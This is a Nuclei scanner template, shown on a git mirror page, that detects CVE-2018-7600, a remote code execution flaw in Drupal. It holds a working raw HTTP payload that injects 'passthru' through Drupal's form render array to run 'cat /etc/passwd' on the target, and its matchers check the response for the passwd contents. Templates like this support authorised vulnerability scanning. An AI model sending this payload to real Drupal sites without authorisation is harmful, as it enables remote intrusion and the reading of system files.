daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2018/CVE-2018-7600.yaml

67 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2018-7600
info:
name: Drupal - Remote Code Execution
author: pikpikcu
severity: critical
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
reference:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
tags: cve,cve2018,drupal,rce,cisa
requests:
- raw:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/13
Reference in New Issue View Git Blame Copy Permalink